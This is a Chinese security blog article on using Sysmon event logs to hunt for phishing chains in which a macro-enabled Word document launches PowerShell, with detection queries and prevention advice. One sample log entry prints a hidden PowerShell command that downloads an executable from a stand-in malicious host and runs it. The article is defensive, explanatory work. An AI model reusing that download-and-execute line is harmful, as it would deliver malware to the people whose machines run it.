回归最本质的信息安全

用Sysmon进行威胁狩猎:发现具有宏的Word文档

2017年10月20日发布

44,315
0
2

导语:用Sysmon进行威胁狩猎

正如我之前所说,Sysmon是一个很好的工具,可以深入了解我们的系统中运行的数据,以及我们的端点发生了什么变化。

让我们用Sysmon对每天发生的常见事件进行一些调查,用户点击带有链接或附件的电子邮件,并打开支持宏的Word文档。

我们来分析“电子邮件”

用户将收到电子邮件的一些变体,无论它是嵌入链接还是附件。

当用户采取以下操作时,我们将看到sysmon记录的操作。我还将包括字段名称,以防您有ELK设置,以便于在您的环境中轻松搜索这些命令/进程。

您将看到捕获这些事件的以下Sysmon事件ID

事件ID 1:进程创建:进程创建事件提供有关新创建的进程的扩展信息。完整的命令行提供了进程执行的上下文。ProcessGUID字段是跨域的此过程的唯一值,以使事件相关更容易。散列是HashType字段中的算法的完整散列。

事件ID 11:FileCreate:创建或覆盖文件时记录文件创建操作。此事件对于监视自动启动位置(如启动文件夹)以及临时和下载目录(这是常见的恶意软件在初始感染期间丢弃)的位置很有用。

事件ID 15:FileCreateStreamHash:创建命名文件流时的事件日志,它生成记录流分配到的文件(未命名流)的内容的散列的事件,以及命名流。存在通过浏览器下载删除其可执行文件或配置设置的恶意软件变体,并且此事件旨在基于浏览器捕获附加Zone.Identifier“网络标记”流的捕获。

 现在我们开始分析吧:

1.点击网络钓鱼邮件链接

EventID: 1
event_data.ParentCommandLine: “C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE”
event_data.Image: C:\Program Files\Internet Explorer\iexplore.exe
event_data.CommandLine: “C:\Program Files\Internet Explorer\iexplore.exe” https://Dcompany.life_qliwiwkwstxrkgbbz_bdfnccd&d=DwMF-Q&c=LQ_lgKiodJdZA
event_data.User: PhishedUser

发生了什么? PhishedUser点击了启动Internet Explorer的Outlook的链接,并打开了以下网站:https://company.life_q…..com

2.下载Word .doc

EventID: 11
event_data.Image: C:\Program Files(x86) \Internet Explorer  \IEXPLORE.EXE
event_data.TargetFilename:  C: \Users  \PhisedUser  \AppData  \Local  \Microsoft  \Windows  \Temporary Internet Files  \Content.IE5  \POHSQH12  \6E713D2A.doc

(注意:日志可能显示为.tmp文件,因为日志记录时下载可能未完成)

3.打开Word文件

EventID: 1
event_data.Image:C: \Program Files(x86) \Microsoft Office  \Office14  \WINWORD.EXE
event_data.TargetFilename: C: \Users  \PhisedUser  \AppData  \Local  \Microsoft  \Windows  \Temporary Internet Files  \Content.IE5  \POHSQH12  \6E713D2A.doc

发生了什么? 用户用Word 打开 6E713D2A.doc 。

4.启用宏的Word文档

EventID: 1
event_data.ParentImage: C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
event_data.ParentCommandLine: “C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE” -Embedding
event_data.Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
event_data.CommandLine: powershell -WindowStyle Hidden $webclient = new-object System.Net.WebClient;$myurls = ‘http://Malicioussite.su/z3FRJz’.Split(‘,’);$path = $env:temp + ‘65536.exe’;foreach($myurl in $myurls){try{$webclient.DownloadFile($myurl.ToString(), $path);Start-Process $path;break;}catch{}}
event_data.User: PhisedUser

发生了什么?用户打开文档并启用宏,并运行了一个powershell命令,该命令正在尝试从http://Malicioussite.su/z3FRJz下载一个名为65536.exe的可执行文件

5.通过Powershell下载的有效载荷

event_id: 11
event_data.Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
event_data.TargetFilename: C:\Users\PhisedUser\AppData\Local\Temp\65536.exe
发生了什么? Powershell将65536.exe 下载  到  C: \Users  \PhisedUser  \AppData  \Local  \Temp

之后,可执行文件可能已经完成了多项工作,例如加密用户的文件,或者建立某种持久性。此时,您希望您在端点上记录其他操作,以确切地知道进行了哪些更改,以下是一些可以帮助您阅读的好文章(库存的未经授权的软件检测出站连接

现在我们知道这些事件是如何被监控的,让我们更简单地寻找这样的动作。

检测这些动作

如果您有良好的日志管理(ELK,Splunk等),您应该有一些预定义的保存的搜索,这将允许您在您的环境中“寻找”或寻找有趣的工件。这是一个查询,您可能会使用它来查找通过Word或其他Microsoft产品启动的某些进程,如(cscript.exe,cmd.exe,powershell.exe,wscript.exe)。

 event_data.ParentImage:office AND(event_data.Image:(wscript.exe或cscript.exe或cmd.exe或powershell.exe))

这将返回:

Microsoft产品(Word,Excel,PowerPoint)等可能会调用其他可执行文件,如下所示:

· rundll.32.exe – 通常你会看到一个事件ID 1,它涉及到outlook中的打印文档(文件>打印)或文件索引(“C:\Windows  \System32  \rundll32.exe”shell32.dll,Control_RunDLL“srchadmin .DLL”)

· conhost.exe

· regsvr32.exe的

· Explorer.exe的

这里还有其他有用的查询,可以从outlook中找到“.doc”文档。

event_data.ParentImage:outlook.exe AND event_data.CommandLine:“.doc”    (由Sysmon生成的事件ID:1)

event_data.Image:outlook.exe AND event_data.TargetFilename:“.doc” (由Sysmon生成的事件ID:15)

确保您检查环境中的所有内容,并确定正常的应用程序行为是什么,什么不是和修改您的查询,以确保您包括任何预期/意外的行为。

防止宏

您的用户将 继续从互联网接收.doc文档。以下是通过单词文档宏保护您的组织免受潜在恶意软件的一些方法。

1. 用户安全意识培训 – 这应该是影响您的组织的任何风险/威胁的首要任务。教你的用户要更加谨慎“停下来,点击前想想”

2. 防止和阻止宏运行通过GPO(Office 2016)。对于office 2013,您可以将办公室设置设置为“ 禁用所有具有通知或不通知的宏 ”

3. 阻止有效载荷下载 – 通过您的第7层防火墙,您可以防止为您的组织和白名单信任站点(例如,更新Microsoft,Oracle,Dell等)下载.exes。

最后说明:

· 监视所有端点日志

· 主动 – 根据过去的攻击媒介创建通知,以便您了解任何活动事件。

· 继续教育你的用户!

下一篇文章,我将介绍如何使用Sysmon事件ID:15从普通网络浏览器中查找用户下载的文件

如若转载,请注明原文地址: http://www.4hou.com/web/8084.html

点赞 2
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

愣娃

愣娃

这个人很懒,什么也没留下

发私信

发表评论